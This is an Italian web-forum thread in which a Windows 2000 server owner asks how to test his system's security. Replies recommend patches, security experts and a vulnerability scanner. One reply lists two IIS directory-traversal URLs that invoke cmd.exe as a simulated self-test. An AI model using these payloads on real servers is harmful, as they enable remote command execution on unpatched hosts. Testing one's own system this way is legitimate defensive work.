Visualizzazione dei risultati da 1 a 6 su 6
  1. #1
    Utente di HTML.it L'avatar di kumm
    Registrato dal
    Jun 2000
    Messaggi
    190
    Ciao ragazzi, visto ke io non sono un hacker e nemmeno (purtroppo) ne capisco niente... COME FACCIO A TESTARE LA SICUREZZA DEL MIO SISTEMA?

    Ho un server W2000 con 2 skede di rete (una pubblica collegata al ROUTER e l'altra privata per la LAN) ed un Firewall (Norton Internet Security) installato sopra...

  2. #2
    Non ci sono sistemi diretti per testare la sicurezza di un sistema. L'unico modo è aggiornare il software tramite i service pack pubblicati periodicamente dalla Microsoft.
    Lo stesso dicasi per i Firewall, in questo caso mantenuti dalla ditta stessa che li produce.

  3. #3
    Concordo...se vale la spesa, potresti affidarti a qualche esperto di sicurezza per effettuare dei test.

  4. #4
    Utente di HTML.it L'avatar di kumm
    Registrato dal
    Jun 2000
    Messaggi
    190
    ok ragazzi, ma non c'è un modo per simulare un attacco, per vedere se mi monitorizza l'aggressore, se scopre l'IP ecc...

    Per scoprire se funziona devo per forza farmi fo***re da un Hacker?? ... e poi dal mio capo?

  5. #5

    allora prova questi

    Per iniziare da un browser qualsiasi prova a digitare questo elenco di malformed url contro il tuo sito web:

    tuosito.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

    tuosito.com/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+echo

    Poi vai a leggere i logfile e riporta il risultato dell'attacco sopra.

    Questo è un esempio di attacco simulato.

    Del resto non esiste un programma che possa simulare il lavoro di un hacker
    In quanto di buchi di sicurezza nel sistema se ne scoprono in media uno o più alla settimana.


  6. #6
    Concordo, non si può in alcun modo simulare l'attacco di un hacker.

    Se non vuoi affidarti a un esperto però esistono programmi in grado di "scovare" le vulnerabilità più utilizzate e creare un report:

    http://www.eeye.com/html/Products/Retina/index.html


Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.